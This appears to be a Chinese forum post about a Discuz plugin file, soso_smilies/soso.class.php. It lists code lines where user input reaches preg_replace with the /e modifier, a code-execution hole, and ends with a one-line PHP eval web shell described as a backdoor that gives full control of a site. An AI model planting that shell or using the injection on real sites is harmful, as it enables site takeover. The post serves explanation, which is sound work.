利用文件（插件路径）：/source/plugin/soso_smilies/soso.class.php


[p=18, null, left][color=rgb(51, 51, 51)]第61行:         if($_GET['ac'] == 'pm' && $_GET['mod'] == 'spacecp') {[/p][p=18, null, left][color=rgb(51, 51, 51)]第62行:         if(empty($_GET['op'])) {[/p][p=18, null, left][color=rgb(51, 51, 51)]第64行:         } elseif($_GET['op'] == 'showmsg') {[/p][p=18, null, left][color=rgb(51, 51, 51)]第67行:         } elseif($_GET['subop'] == 'view' && $_GET['do'] == 'pm' && $_GET['mod'] == 'space') {[/p][p=18, null, left][color=rgb(51, 51, 51)]第113行:         if(!empty($_GET['message'])) {[/p][p=18, null, left][color=rgb(51, 51, 51)]第139行:         if($_GET['ac'] == 'profile' && submitcheck('profilesubmitbtn') && !empty($_POST['sightml'])) {[/p][p=18, null, left][color=rgb(51, 51, 51)]第140行:         $_POST['sightml'] = preg_replace("/\{\:soso_((e\d+)|(_\d+_\d))\:\}/e", '$this->_soso_smiles("\\1", -1, 0, 1)', $_POST['sightml'], $_G['setting']['maxsmilies']);[/p][p=18, null, left][color=rgb(51, 51, 51)]第152行:         } elseif($_GET['op'] == 'showchatmsg' && $GLOBALS['list']) {[/p][p=18, null, left][color=rgb(51, 51, 51)]第163行:         if(!empty($_GET['subop'])) {[/p]
[color=rgb(51, 51, 51)][backcolor=rgb(247, 247, 247)][backcolor=rgb(243, 243, 243)]一句话木马

[color=rgb(51, 51, 51)]黑客在php文件中插入<?php @eval($_POST['黑客的密码']);?>这样的语句，来当做控制网站的后门，利用改后门能完全控制网站任意文件这就被称为一句话木马，它是基于B/S结构的。